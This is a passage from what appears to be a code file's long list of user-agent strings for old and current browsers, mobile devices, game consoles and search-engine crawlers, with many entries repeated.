OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; 